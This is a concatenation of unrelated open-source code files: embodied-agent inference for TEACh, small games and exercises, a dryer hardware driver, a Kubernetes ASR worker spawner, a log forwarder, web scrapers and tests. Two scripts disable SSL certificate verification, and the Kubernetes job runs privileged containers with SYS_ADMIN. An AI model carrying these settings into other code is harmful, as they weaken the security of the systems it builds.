smooth_nav=True, mask_px_sample=1, debug=False):\n '''\n interact mask based action call\n '''\n\n\n all_ids = []\n\n if type(interact_mask) is str and interact_mask == \"NULL\":\n raise Exception(\"NULL mask.\")\n elif interact_mask is not None:\n # ground-truth instance segmentation mask from THOR\n instance_segs = np.array(simulator.controller.last_event.instance_segmentation_frame)\n\n if debug:\n print(\"step %s\", dict(action=\"Pass\", renderObjectImage=True))\n if instance_segs is None:\n simulator.controller.step(action=\"Pass\", renderObjectImage=True)\n instance_segs = np.array(simulator.controller.last_event.instance_segmentation_frame)\n\n color_to_object_id = simulator.controller.last_event.color_to_object_id\n\n # get object_id for each 1-pixel in the interact_mask\n nz_rows, nz_cols = np.nonzero(interact_mask)\n instance_counter = Counter()\n for i in range(0, len(nz_rows), mask_px_sample):\n x, y = nz_rows[i], nz_cols[i]\n #ForkedPdb().set_trace()\n instance = tuple(instance_segs[x, y])\n instance_counter[instance] += 1\n if debug:\n print(\"action_box\", \"instance_counter\", instance_counter)\n\n # iou scores for all instances\n iou_scores = {}\n for color_id, intersection_count in instance_counter.most_common():\n union_count = np.sum(np.logical_or(np.all(instance_segs == color_id, axis=2), interact_mask.astype(bool)))\n iou_scores[color_id] = intersection_count / float(union_count)\n iou_sorted_instance_ids = list(OrderedDict(sorted(iou_scores.items(), key=lambda x: x[1], reverse=True)))\n\n # get the most common object ids ignoring the object-in-hand\n inv_obj = simulator.controller.last_event.metadata['inventoryObjects'][0]['objectId'] \\\n if len(simulator.controller.last_event.metadata['inventoryObjects']) > 0 else None\n all_ids = [color_to_object_id[color_id] for color_id in iou_sorted_instance_ids\n if color_id in color_to_object_id and color_to_object_id[color_id] != inv_obj]\n\n # print all ids\n if debug:\n print(\"action_box\", \"all_ids\", all_ids)\n\n # print instance_ids\n instance_ids = [inst_id for inst_id in all_ids if inst_id is not None]\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n # prune invalid instances like floors, walls, etc.\n instance_ids = self.prune_by_any_interaction(simulator, instance_ids)\n\n # cv2 imshows to show image, segmentation mask, interact mask\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n instance_seg *= 255\n\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', simulator.controller.last_event.frame[:,:,::-1])\n cv2.waitKey(0)\n\n if len(instance_ids) == 0:\n err = \"Bad interact mask. Couldn't locate target object\"\n success = False\n return success, None, None, err, None\n\n target_instance_id = instance_ids[0]\n else:\n target_instance_id = \"\"\n\n if debug:\n print(\"taking action: \" + str(action) + \" on target_instance_id \" + str(target_instance_id))\n #ForkedPdb().set_trace()\n # event, api_action = self.to_thor_api_exec(action, simulator, target_instance_id, smooth_nav)\n try:\n event, api_action = self.to_thor_api_exec(action, simulator, target_instance_id, smooth_nav)\n except Exception as err:\n success = False\n return success, None, None, err, None\n\n if not event.metadata['lastActionSuccess']:\n if interact_mask is not None and debug:\n print(\"Failed to execute action!\", action, target_instance_id)\n print(\"all_ids inside BBox: \" + str(all_ids))\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', simulator.controller.last_event.frame[:,:,::-1])\n cv2.waitKey(0)\n print(event.metadata['errorMessage'])\n success = False\n return success, event, target_instance_id, event.metadata['errorMessage'], api_action\n\n success = True\n return success, event, target_instance_id, '', api_action\n\n\n def step(self, action, simulator):\n\n # The ALFRED API does not accept the Stop action, do nothing\n message = \"\"\n #ForkedPdb().set_trace()\n if action.is_stop():\n done = True\n transition_reward = 0\n api_action = None\n events = []\n\n # Execute all other actions in the ALFRED API\n else:\n definitions = Definitions(version=\"2.0\")\n #action_definition = definitions.map_actions_id2info[action.action_id]\n alfred_action, interact_mask = action.to_teach_api()\n\n ret = self.va_interact(alfred_action, simulator, interact_mask, smooth_nav=self.smooth_nav)\n\n # Default version of ALFRED\n if len(ret) == 5:\n exec_success, event, target_instance_id, err, api_action = ret\n events = []\n # Patched version of ALFRED that returns intermediate events from smooth actions\n # To use this, apply the patch alfred-patch.patch onto the ALFRED code:\n # $ git am alfred-patch.patch\n elif len(ret) == 6:\n exec_success, event, events, target_instance_id, err, api_action = ret\n else:\n raise ValueError(\"Invalid number of return values from ThorEnv\")\n #ForkedPdb().set_trace()\n\n # if not self.task.traj_data.is_test():\n # transition_reward, done = self.thor_env.get_transition_reward()\n # done = False\n # else:\n transition_reward, done = 0, False\n\n if not exec_success:\n fatal = self._error_is_fatal(err)\n print(f\"ThorEnv {'fatal' if fatal else 'non-fatal'} Exec Error: {err}\")\n if fatal:\n done = True\n api_action = None\n message = str(err)\n\n #self.prof.tick(\"step\")\n\n # Track state (pose and inventory) from RGB images and actions\n event = simulator.controller.last_event\n # self.state_tracker.log_action(action)\n self.latest_action = action\n self.latest_event = event\n self.latest_extra_events = events\n self.latest_observation = copy.deepcopy(self._make_observation())\n\n observation = copy.deepcopy(self.latest_observation)\n observation.privileged_info.attach_task(self.task) # TODO: See if we can get rid of this?\n if self.device:\n observation = observation.to(self.device)\n\n # if not self.task.traj_data.is_test():\n # reward = transition_reward - 0.05\n # goal_satisfied = self.thor_env.get_goal_satisfied()\n # goal_conditions_met = self.thor_env.get_goal_conditions_met()\n # task_success = goal_satisfied\n # md = {\n # \"success\": task_success,\n # \"goal_satisfied\": goal_satisfied,\n # \"goal_conditions_met\": goal_conditions_met,\n # \"message\": message,\n # }\n # else:\n reward = 0\n md = {}\n\n self.steps += 1\n\n return observation, reward, done, md, exec_success\n\n def get_next_action(self, img, original_edh_instance, edh_instance, prev_action, simulator, img_name=None, edh_name=None):\n \"\"\"\n Sample function producing random actions at every time step. When running model inference, a model should be\n called in this function instead.\n :param img: PIL Image containing agent's egocentric image\n :param edh_instance: EDH instance\n :param prev_action: One of None or a dict with keys 'action' and 'obj_relative_coord' containing returned values\n from a previous call of get_next_action\n :param img_name: image file name\n :param edh_name: EDH instance file name\n :return action: An action name from all_agent_actions\n :return obj_relative_coord: A relative (x, y) coordinate (values between 0 and 1) indicating an object in the image;\n The TEACh wrapper on AI2-THOR examines the ground truth segmentation mask of the agent's egocentric image, selects\n an object in a 10x10 pixel patch around the pixel indicated by the coordinate if the desired action can be\n performed on it, and executes the action in AI2-THOR.\n \"\"\"\n # img_feat = self.extractor.featurize([img], batch=1)\n # self.input_dict[\"frames\"] = img_feat\n\n #ForkedPdb().set_trace()\n with torch.no_grad():\n #prev_api_action = None\n #if prev_action is not None and \"action\" in prev_action:\n # prev_api_action = prev_action[\"action\"]\n\n next_observation, reward, done, md, exec_success = self.step(prev_action, simulator)\n #ForkedPdb().set_trace()\n action = self.model.act(next_observation)\n #ForkedPdb().set_trace()\n self.counter += 1\n return action, exec_success#predicted_click\n\n def get_obj_click(self, obj_class_idx, img):\n rcnn_pred = self.object_predictor.predict_objects(img)\n obj_class_name = self.object_predictor.vocab_obj.index2word(obj_class_idx)\n candidates = list(filter(lambda p: p.label == obj_class_name, rcnn_pred))\n if len(candidates) == 0:\n return [np.random.uniform(), np.random.uniform()]\n index = np.argmax([p.score for p in candidates])\n mask = candidates[index].mask[0]\n predicted_click = list(np.array(mask.nonzero()).mean(axis=1))\n predicted_click = [\n predicted_click[0] / mask.shape[1],\n predicted_click[1] / mask.shape[0],\n ]\n return predicted_click\n\n def obstruction_detection(self, action, prev_action_success, m_out, vocab_out):\n \"\"\"\n change 'MoveAhead' action to a turn in case if it has failed previously\n \"\"\"\n if action != \"Forward\" or prev_action_success:\n return action\n dist_action = m_out[\"action\"][0][0].detach().cpu()\n idx_rotateR = vocab_out.word2index(\"Turn Right\")\n idx_rotateL = vocab_out.word2index(\"Turn Left\")\n action = \"Turn Left\" if dist_action[idx_rotateL] > dist_action[idx_rotateR] else \"Turn Right\"\n logger.debug(\"Blocking action is changed to: %s\" % str(action))\n return action\n","repo_name":"goonmeet/hlsm_inference_teach","sub_path":"src/teach/inference/hlsm_model.py","file_name":"hlsm_model.py","file_ext":"py","file_size_in_byte":27872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5162028612","text":"import os, pygame, grid\n\n\n\n\npygame.init()\n\n\n\"\"\"\nImplementacja algorytmu min max dla gry kolko i krzyzyk\n\"\"\"\n\n\n\ndef main():\n \"\"\"\n Glowna funkcja wywolujaca pozostlae funkcje\n \"\"\"\n grid.clean()\n h_choice = 'X' # X or O\n c_choice = 'O' # X or O\n first = 'Y' # gracz jest pierwszy\n\n # glowna petla programu\n while len(grid.empty_cells(grid.board)) > 0 and not grid.game_over(grid.board):\n if first == 'N':\n grid.ai_turn(c_choice, h_choice)\n first = ''\n\n grid.human_turn(c_choice, h_choice)\n\n grid.ai_turn(c_choice, h_choice)\n\n # wiadomosc na koniec gry\n if grid.wins(grid.board, grid.HUMAN):\n grid.clean()\n print(f'Human turn [{h_choice}]')\n # grid.render(grid.board, c_choice, h_choice)\n print('YOU WIN!')\n elif grid.wins(grid.board, grid.COMP):\n grid.clean()\n print(f'Computer turn [{c_choice}]')\n #grid.render(grid.board, c_choice, h_choice)\n print('YOU LOSE!')\n else:\n grid.clean()\n #grid.render(grid.board, c_choice, h_choice)\n print('DRAW!')\n\n exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Krokos11/Kolko-i-Krzyzyk","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15053863209","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 20 15:45:54 2019\r\nABC039D\r\n@author: maezawa\r\n\"\"\"\r\n\r\nimport itertools as itr\r\nimport copy\r\n\r\nh, w = list(map(int, input().split()))\r\na = [['_']*(w+2) for _ in range(h+2)]\r\nfor i in range(1, h+1):\r\n raw = list(input())\r\n a[i][1:w+1] = raw\r\n\r\nb = copy.deepcopy(a)\r\n\r\n#print(*a, sep='\\n')\r\n \r\ndef areblacks(arr, i0, j0):\r\n for i in range(i0-1,i0+2):\r\n for j in range(j0-1,j0+2):\r\n if arr[i][j] == '#':\r\n return True\r\n return False\r\n\r\ndef arewhites(arr, i0, j0):\r\n for i in range(i0-1,i0+2):\r\n for j in range(j0-1,j0+2):\r\n if arr[i][j] == '.':\r\n return True\r\n return False\r\n \r\nfor i, j in itr.product(range(1, h+1),range(1, w+1)):\r\n if a[i][j] == '.':\r\n continue\r\n if arewhites(a, i, j):\r\n b[i][j] = '.'\r\n #print(i,j,b[i][j])\r\n \r\nc = copy.deepcopy(b)\r\nfor i, j in itr.product(range(1, h+1),range(1, w+1)):\r\n if b[i][j] == '#':\r\n continue\r\n if areblacks(b, i, j):\r\n c[i][j] = '#' \r\n\r\nif a == c:\r\n print('possible')\r\n for i in range(1, h+1):\r\n print(''.join(b[i][1:w+1]))\r\nelse:\r\n print('impossible')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc039/D/4050136.py","file_name":"4050136.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38936342438","text":"from machine import Pin, I2C\nimport time\n\nimport config\n\n\nclass Heater:\n def __init__(self, hardware: \"Hardware\"):\n self._power = False\n self._board_C = 0.0\n self._hardware = hardware\n self.write_power()\n\n @property\n def power_controlled(self) -> bool:\n if self._board_C > config.HEATER_BOARD_MAX_C:\n return False\n return self._power\n\n def set_power(self, power: bool):\n self._power = power\n\n self.write_power()\n\n def set_board_C(self, board_C: int):\n self._board_C = board_C\n\n self.write_power()\n\n def write_power(self) -> None:\n power = self.power_controlled\n\n self._hardware.PIN_GPIO_HEATER_A.value(power)\n self._hardware.PIN_GPIO_HEATER_B.value(power)\n\n\nclass Hardware:\n def __init__(self):\n self.PIN_GPIO_BUTTON = Pin(\"GPIO22\", mode=Pin.IN, pull=Pin.PULL_UP)\n self.PIN_GPIO_LED_GREEN = Pin(\"GPIO21\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_LED_RED = Pin(\"GPIO20\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_LED_WHITE = Pin(\"GPIO19\", mode=Pin.OUT, value=0)\n\n self.PIN_GPIO_HEATER_A = Pin(\"GPIO7\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_HEATER_B = Pin(\"GPIO2\", mode=Pin.OUT, value=0)\n\n self.PIN_GPIO_FAN_AMBIENT = Pin(\"GPIO5\", mode=Pin.OUT, value=0) # vorher 0\n self.PIN_GPIO_FAN_FILAMENT = Pin(\"GPIO18\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_FAN_BOX = Pin(\"GPIO4\", mode=Pin.OUT, value=0)\n\n self.i2c0 = I2C(id=0, scl=Pin(\"GPIO17\"), sda=Pin(\"GPIO16\"), freq=400000)\n self.i2c1 = I2C(id=1, scl=Pin(\"GPIO27\"), sda=Pin(\"GPIO26\"), freq=400000)\n self.heater = Heater(self)\n\n def production_test(self, wdt_feed_cb):\n # Neue prints testen\n while True:\n for name, pin in (\n (\"led g\",self.PIN_GPIO_LED_GREEN),\n (\"led r\",self.PIN_GPIO_LED_RED),\n (\"led w\",self.PIN_GPIO_LED_WHITE),\n (\"fan silicagel\",self.PIN_GPIO_FAN_FILAMENT),\n (\"heater a\",self.PIN_GPIO_HEATER_A),\n (\"heater b\",self.PIN_GPIO_HEATER_B),\n (\"fan silicagel\",self.PIN_GPIO_FAN_BOX),\n (\"fan ambient\",self.PIN_GPIO_FAN_AMBIENT),\n\n\n ):\n print(name)\n pin.value(1)\n time.sleep(2)\n pin.value(0)\n wdt_feed_cb()","repo_name":"petermaerki/2023_filament_dryer_git","sub_path":"software/micropython/mod_hardware.py","file_name":"mod_hardware.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74684028392","text":"from kubernetes import client, config\nimport logging\nfrom kubernetes.client.rest import ApiException\nimport random\nimport string\nimport os\nimport sys\n\n\nimport logging\n\n# TODO: remember to change this field to the name of Docker image used\nIMAGE = \"lyvt/online-asr\"\nMASTER = os.getenv(\"MASTER\", False)\nNAMESPACE = os.getenv(\"NAMESPACE\", False)\n\nif (NAMESPACE == False or\n MASTER == False or\n NAMESPACE == False):\n sys.exit(\"No values for NAMESPACE=\"\n + str(NAMESPACE)\n + \" MASTER=\"+str(MASTER)\n + \" NAMESPACE=\"+str(NAMESPACE))\n\nconfig.load_kube_config()\n\n\ndef spawn_worker(model):\n \"\"\"\n Spawn a new worker with the model specified if all the workers are in use.\n Call this function before pop()\n Will not spawn new worker when running as docker-compose up, check 'master:8080'\n\n model : str\n The name of model\n \"\"\"\n if MASTER == 'master:8080':\n return\n\n logging.info(\"start to spawn a new worker with model=\"+model)\n create_job(model)\n\n\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef create_job(MODEL):\n\n assert MODEL is not None, \"model name is None, cannot spawn a new worker\"\n\n api = client.BatchV1Api()\n\n body = client.V1Job(api_version=\"batch/v1\", kind=\"Job\")\n name = 'speechlab-worker-job-{}-{}'.format(\n MODEL.lower().replace(\"_\", \"-\"), id_generator())\n body.metadata = client.V1ObjectMeta(namespace=NAMESPACE, name=name)\n body.status = client.V1JobStatus()\n template = client.V1PodTemplate()\n template.template = client.V1PodTemplateSpec()\n template.template.metadata = client.V1ObjectMeta(\n annotations={\n \"prometheus.io/scrape\": \"true\",\n \"prometheus.io/port\": \"8081\"\n }\n )\n volume = client.V1Volume(\n # change these values to the same names you used in deployment.yaml\n name=\"local-models\",\n persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(\n claim_name=\"local-models-pvc\"\n )\n )\n env_vars = {\n \"MASTER\": MASTER,\n \"NAMESPACE\": NAMESPACE,\n \"RUN_FREQ\": \"ONCE\",\n \"MODEL_DIR\": MODEL, # important\n }\n\n env_list = []\n if env_vars:\n for env_name, env_value in env_vars.items():\n env_list.append(client.V1EnvVar(name=env_name, value=env_value))\n\n container = client.V1Container(name='{}-c'.format(name),\n image=IMAGE,\n image_pull_policy=\"IfNotPresent\",\n command=[\"/home/appuser/opt/tini\", \"--\",\n \"/home/appuser/opt/start_worker.sh\"],\n env=env_list,\n ports=[client.V1ContainerPort(\n container_port=8081,\n name=\"prometheus\"\n )],\n security_context=client.V1SecurityContext(\n privileged=True, capabilities=client.V1Capabilities(add=[\"SYS_ADMIN\"])),\n resources=client.V1ResourceRequirements(\n limits={\"memory\": \"4G\", \"cpu\": \"1\"}, \n requests={\"memory\": \"4G\", \"cpu\": \"1\"}\n ),\n volume_mounts=[client.V1VolumeMount(\n # change these values to the same names you used in deployment.yaml\n mount_path=\"/home/appuser/opt/models\",\n name=\"local-models\",\n read_only=True\n )]\n )\n template.template.spec = client.V1PodSpec(containers=[container],\n image_pull_secrets=[\n {\"name\": \"azure_template-cr-secret\"}],\n # reason to use OnFailure https://github.com/kubernetes/kubernetes/issues/20255\n restart_policy=\"OnFailure\",\n volumes=[volume]\n )\n\n # And finaly we can create our V1JobSpec!\n body.spec = client.V1JobSpec(\n ttl_seconds_after_finished=100, template=template.template)\n\n try:\n api_response = api.create_namespaced_job(NAMESPACE, body)\n print(\"api_response=\"+ str(api_response))\n return True\n except ApiException as e:\n logging.exception('error spawning new job')\n print(\"Exception when creating a job: %s\\n\" % e)\n","repo_name":"bchen012/ntu_asr","sub_path":"local-deployment/docker/scripts/master_server_addon.py","file_name":"master_server_addon.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30056410152","text":"from __future__ import print_function\nfrom time import time\nfrom socket import getfqdn, gethostname, socket, AF_INET, SOCK_DGRAM\nfrom StringIO import StringIO\nimport zlib\nimport json\n\nclass Output(object):\n \"\"\"\n Class to redirect logs from stdout to graylog2 server\n \"\"\"\n\n def __init__(self, graylog_server='127.0.0.1', graylog_port=12201,\n level=1, facility='local1',\n max_buffer_size=1400,\n host=getfqdn(gethostname())):\n\n # connection settings\n self.graylog_server = graylog_server\n self.graylog_port = graylog_port\n\n # GELF settings\n self.version = '1.0'\n self.host = host\n self.level = level\n self.facility = facility\n\n self.socket = socket(AF_INET,SOCK_DGRAM)\n\n def send(self, message):\n z = zlib.compress(json.dumps(message))\n self.socket.sendto(z, (self.graylog_server,self.graylog_port))\n\n def processing(self, line):\n \"\"\"\n Processing line (send line to Graylog2 server)\n \"\"\"\n timestamp = int(time())\n short_message = line.strip()\n message = {\n 'version': self.version,\n 'host': self.host,\n 'facility': self.facility,\n 'level': self.level,\n 'timestamp': timestamp,\n 'short_message': short_message\n }\n #try:\n self.send(message)\n #except:\n # print(\"ERROR sending message\")\n","repo_name":"verm666/stdlogger","sub_path":"stdlogger/outputs/gelf.py","file_name":"gelf.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36022642034","text":"from fpdf import FPDF\nfrom ..fun import age, decode_result\n\nfrom flask.ext.babel import gettext\n\n\nclass PDF(FPDF):\n def __init__(self, user, diagnosis):\n super().__init__()\n self.user = user\n self.diagnosis = diagnosis\n self.add_font(\n 'DejaVu', \n '', \n './app/main/util/pdf/fonts/DejaVuSansCondensed.ttf', \n uni=True\n )\n self.add_font(\n 'DejaVu', \n 'B', \n './app/main/util/pdf/fonts/DejaVuSansCondensed-Bold.ttf', \n uni=True\n )\n self.add_font(\n 'DejaVu', \n 'I', \n './app/main/util/pdf/fonts/DejaVuSansCondensed-Oblique.ttf', \n uni=True\n )\n \n\n def header(self):\n # Logo\n self.image('./app/main/util/pdf/Logo.png', 5, 8, 53)\n # Arial bold 15\n self.set_font('DejaVu', '', 9)\n self.set_text_color(105, 105, 105)\n # Move to the right\n self.cell(120)\n # Title\n self.cell(30, 4, gettext('Patient: ') + self.user.first_name + ' ' + self.user.second_name)\n \n self.cell(-30)\n self.cell(0, 14, gettext('Patient username: @') + self.user.username)\n\n self.cell(-70)\n self.cell(0, 24, gettext('Patient age: ') + str(age(self.user.date_of_birth)))\n\n self.cell(-70)\n self.cell(0, 34, gettext('Result: ') + decode_result(\n self.diagnosis.result,\n scrape=False\n )\n )\n\n self.cell(-70)\n self.cell(0, 44, gettext('Date of diagnostics: ') +\n self.diagnosis.checked_on.strftime('%d.%m.%Y %H:%M:%S')\n )\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('DejaVu', 'I', 8)\n # Page number\n self.cell(0, 10, gettext('Page ') + str(self.page_no()) + '/{nb}', 0, 0, 'C')\n","repo_name":"iamdanmaks/spero_backend","sub_path":"app/main/util/pdf/pdf_class.py","file_name":"pdf_class.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15739716362","text":"import urllib.request as urllib\nfrom bs4 import BeautifulSoup\nimport ssl\nimport sqlite3\n\nconn = sqlite3.connect('animals.sqlite')\ncur = conn.cursor()\ncur.executescript('''\nDROP TABLE IF EXISTS Animals;\n\nCREATE TABLE Animals (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT UNIQUE\n)\n''')\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nANIMALS = dict()\nURL = 'https://ru.wikipedia.org/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%96%D0%B8%D0%B2%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D0%BF%D0%BE_%D0%B0%D0%BB%D1%84%D0%B0%D0%B2%D0%B8%D1%82%D1%83'\n\ndef parse_sql():\n global ANIMALS\n cur.execute('SELECT count(*) FROM Animals')\n number_of_animals = cur.fetchone()[0]\n for id in range(1, number_of_animals + 1):\n cur.execute('SELECT name FROM Animals WHERE id = ? ', (id, ))\n row = cur.fetchone()[0]\n ANIMALS[row[0]] = ANIMALS.get(row[0], 0) + 1\n\n\n\ndef parse_wiki(url_link):\n fhand = urllib.urlopen(url_link, context = ctx).read()\n soup = BeautifulSoup(fhand, 'html.parser')\n tags = soup('a')\n return tags\n\n\ndef parse():\n while True:\n global URL\n tags = parse_wiki(URL)\n if 'Aaaaba' in str(tags): break\n for tag in tags:\n if 'Следующая страница' in str(tag): URL = 'https://ru.wikipedia.org/' + str(tag.get('href'))\n if tag.get('title', None) == None: continue\n if tag.get('title') == 'Служебная:Категории': break\n if ':' in str(tag.get('title')): continue\n cur.execute('''INSERT OR IGNORE INTO Animals (name) VALUES ( ? )''', ( tag.get('title'), ) )\n conn.commit()\n parse_sql()\n\n\nparse()\ncur.close()\nprint(ANIMALS.items())","repo_name":"Amaym0n/greencode","sub_path":"pet_projects/parse_wiki_animals/animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17317479375","text":"#\n# Title: Extracting Data from JSON API\n# Author: Claudio Asangong\n#\n# In this assignment you will write a Python program that prompts for a URL,\n# read the JSON data from that URL using urllib and then parse and extract the\n# comment counts from the JSON data, compute the sum of the numbers in the file\n#\n# We provide two files for this assignment. One is a sample file where we give\n# you the sum for your testing and the other is the actual data you need to\n# process for the assignment.\n#\n# Sample data: http://py4e-data.dr-chuck.net/comments_42.json (Sum=2553)\n# Actual data: http://py4e-data.dr-chuck.net/comments_174563.json\n# (Sum ends with 40)\n#\n# Concepts: JSON, urllib\n\nimport urllib.request\nimport json\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nwhile True:\n url = input(\"Enter data url: \")\n if len(url) < 1:\n break\n print('Retrieving', url)\n urlhandler = urllib.request.urlopen(url, context=ctx)\n urldata = urlhandler.read().decode()\n print('Retrieved', len(urldata), 'characters')\n\n # parse the json data into python object (deserialize)\n try:\n js = json.loads(urldata)\n except Exception:\n print('==== Failure To Retrieve ====')\n print(urldata)\n continue\n\n print('Count:', len(js['comments']))\n total = 0\n for d in js['comments']:\n total += d['count']\n print('Sum:', total)\n","repo_name":"aclaudio123/python-for-everybody","sub_path":"Crs3_python_access_web_data/json_comments_count.py","file_name":"json_comments_count.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22900235524","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport sys\nfrom io import StringIO\n\n# Allow interactive execution from CLI, cd tests; ./test_cli.py\nif __package__ is None:\n sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport contextlib\nimport unittest\n\nfrom ksconf.command import get_entrypoints\nfrom ksconf.consts import EXIT_CODE_NO_SUCH_FILE, EXIT_CODE_SUCCESS, EXIT_CODE_USER_QUIT\nfrom tests.cli_helper import FakeStdin, TestWorkDir, ksconf_cli\n\n\nclass CliSimpleTestCase(unittest.TestCase):\n \"\"\" Test some very simple CLI features. \"\"\"\n\n def test_help(self):\n out = ksconf_cli(\"--help\")\n with ksconf_cli:\n self.assertIn(\"Ksconf Splunk CONFig tool\", out.stdout)\n self.assertIn(\"usage: \", out.stdout)\n self.assertEqual(out.returncode, EXIT_CODE_SUCCESS)\n\n def test_conffileproxy_invalid_arg(self):\n bad_conf = \"\"\"\n [dangling stanza\n attr = 1\n bad file = very true\"\"\"\n twd = TestWorkDir()\n badfile = twd.write_file(\"bad_conf.conf\", bad_conf)\n with ksconf_cli:\n\n # A command that uses ConfFileType() with mode=\"load\"\n base_cmd = [\"rest-export\"]\n\n ko = ksconf_cli(*base_cmd + [twd.get_path(\"a_non_existent_file.conf\")])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, r\".*\\b(can't open '[^']+\\.conf'|invalid ConfFileType).*\")\n\n ko = ksconf_cli(*base_cmd + [badfile])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, \".*(failed to parse|invalid ConfFileType).*\")\n\n with FakeStdin(bad_conf):\n ko = ksconf_cli(*base_cmd + [\"-\"])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, \".*(failed to parse|invalid ConfFileType).*\")\n\n def test_get_named_entrypoint(self):\n eps = get_entrypoints(\"ksconf_cmd\", \"diff\")\n self.assertEqual(len(eps), 1)\n assert eps[\"diff\"]\n\n def test_entrypoint_debug(self):\n from ksconf.setup_entrypoints import debug\n stdout = StringIO()\n with contextlib.redirect_stdout(stdout):\n debug()\n assert \"Builtin entrypoints\" in stdout.getvalue()\n\n\nif __name__ == '__main__': # pragma: no cover\n unittest.main()\n","repo_name":"Kintyre/ksconf","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"4976402375","text":"import pytest\nimport torch\n\nfrom src.models.model import MyAwesomeModel\n\n\nclass TestModel:\n # mark.parametrize enables parametrization of arguments for a test function\n # checks if certain input has the correct shape\n @pytest.mark.parametrize(\n \"test_input,expected\",\n [\n (torch.randn(1, 1, 2, 28), ValueError),\n (torch.randn(64, 1, 28, 2), ValueError),\n (torch.randn(100, 3, 28, 28), ValueError),\n ],\n )\n def test_model_input_shape(self, test_input, expected):\n model = MyAwesomeModel(0.25, 0.5)\n model.train()\n # if the input has the wrong shape, the model should raise a ValueError\n with pytest.raises(\n expected, match=\"Expected each x sample to have shape 1,28,28\"\n ):\n model.forward(test_input)\n\n # checks if the output shape is correct\n @pytest.mark.parametrize(\n \"test_input,expected\",\n [\n (torch.randn(1, 1, 28, 28), (1, 10)),\n (torch.randn(64, 1, 28, 28), (64, 10)),\n (torch.randn(100, 1, 28, 28), (100, 10)),\n ],\n )\n def test_model_output(self, test_input, expected):\n model = MyAwesomeModel(0.25, 0.5)\n output = model(test_input)\n assert output.shape == expected\n","repo_name":"abzink/MLops-2023","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25620250634","text":"from enum import Enum\nfrom typing import List, Dict\n\nfrom src.ai.ai_data_and_info.ai_awards.ai_awards_definer import AiAwardsDefiner\nfrom src.ai.ai_data_and_info.ai_info import AiInfo\nfrom src.ai.neural_network.technology_adapter.builder.command_cost_definer_layer_builder import \\\n CommandCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.builder.input_param_cost_definer_layer_builder import \\\n InputParamCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.error_function import ErrorFunction\nfrom src.ai.neural_network.technology_adapter.network_adapter import NetworkAdapter\nfrom src.ai.neural_network.technology_adapter.network_layer import NetworkLayer, NetworkLayers\nfrom 